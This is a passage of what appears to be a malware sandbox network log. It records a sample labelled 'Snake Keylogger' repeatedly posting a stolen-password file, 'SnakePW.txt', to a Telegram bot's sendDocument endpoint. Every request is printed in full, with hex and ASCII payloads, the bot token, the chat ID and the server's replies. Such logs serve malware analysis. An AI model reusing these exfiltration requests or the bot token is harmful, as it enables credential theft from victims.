                            2022-06-26 07:33:36 UTC230OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 66 37 30 31 65 64 65 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5756f701edebContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:33:36 UTC230INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:33:36 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:33:36 UTC230INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 38 39 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 31 36 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66898,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228816,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            137192.168.2.549992149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:33:37 UTC231OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5756f73feb89
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:33:37 UTC231OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 66 37 33 66 65 62 38 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5756f73feb89Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:33:37 UTC232INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:33:37 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:33:37 UTC232INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 38 39 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 31 37 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66899,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228817,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            138192.168.2.549993149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:33:37 UTC233OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5756f77b866a
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:33:37 UTC233OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 66 37 37 62 38 36 36 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5756f77b866aContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:33:37 UTC233INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:33:37 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:33:37 UTC234INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 39 30 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 31 37 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66901,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228817,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            139192.168.2.549994149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:33:37 UTC234OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5756f7b25b44
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:33:37 UTC235OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 66 37 62 32 35 62 34 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5756f7b25b44Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:33:38 UTC235INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:33:38 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:33:38 UTC235INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 39 30 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 31 38 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66902,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228818,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            14192.168.2.549782149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:32:43 UTC23OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5756d7a1a28a
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:32:43 UTC23OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 64 37 61 31 61 32 38 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5756d7a1a28aContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:32:44 UTC24INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:32:44 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:32:44 UTC24INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 37 36 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 36 34 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66760,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228764,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            140192.168.2.549995149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:33:38 UTC236OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5756f7edf6c4
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:33:38 UTC236OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 66 37 65 64 66 36 63 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5756f7edf6c4Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:33:38 UTC237INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:33:38 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:33:38 UTC237INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 39 30 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 31 38 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66903,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228818,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            141192.168.2.549996149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:33:38 UTC238OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5756f82bf373
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:33:38 UTC238OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 66 38 32 62 66 33 37 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5756f82bf373Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:33:38 UTC238INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:33:38 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:33:38 UTC239INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 39 30 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 31 38 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66904,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228818,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            142192.168.2.549997149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:33:38 UTC239OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5756f86067ac
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:33:38 UTC240OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 66 38 36 30 36 37 61 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5756f86067acContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:33:39 UTC240INHTTP/1.1 200 OK
